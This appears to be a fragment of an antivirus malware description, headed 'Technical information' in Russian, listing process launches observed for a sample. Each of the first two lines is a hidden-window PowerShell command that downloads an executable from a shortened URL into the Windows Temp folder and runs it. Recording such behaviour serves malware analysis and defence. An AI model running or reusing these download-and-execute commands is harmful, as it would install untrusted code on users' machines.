Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden wget https://rb.gy/nymm9c -o %WINDIR%\Temp\jCBBz.exe;explorer.exe %WINDIR%\Temp\jCBBz.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden wget https://rb.gy/nymm9c -o %WINDIR%\Temp\jCBBz.exe;explorer.exe %WINDIR%\Temp\jCBBz.exe' (со скрытым окном)
- '%WINDIR%\explorer.exe' %WINDIR%\Temp\jCBBz.exe